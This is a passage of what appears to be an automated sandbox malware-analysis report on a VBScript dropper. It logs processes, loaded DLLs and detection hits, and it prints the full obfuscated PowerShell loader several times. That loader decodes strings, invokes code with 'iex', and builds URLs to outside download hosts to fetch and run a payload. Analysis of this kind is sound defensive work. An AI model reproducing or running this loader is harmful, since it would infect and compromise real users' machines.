DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok Rekoe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t"Jump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: Binary string: ystem.pdbM source: powershell.exe, 00000001.00000002.3005157693.00000273D325E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.3005157693.00000273D31D4000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdbk source: powershell.exe, 00000001.00000002.3005157693.00000273D31D4000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdb source: powershell.exe, 00000001.00000002.3005157693.00000273D31F4000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      VBScript performs obfuscated calls to suspicious functions
      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("POWERSHELL "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 N", "0")
      Obfuscated command line found
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok Rekoe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeJump to behavior
      Suspicious powershell command line found
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok Rekoe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B7600AD pushad ; iretd 1_2_00007FFD9B7600C1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B835479 push ebp; iretd 1_2_00007FFD9B835538
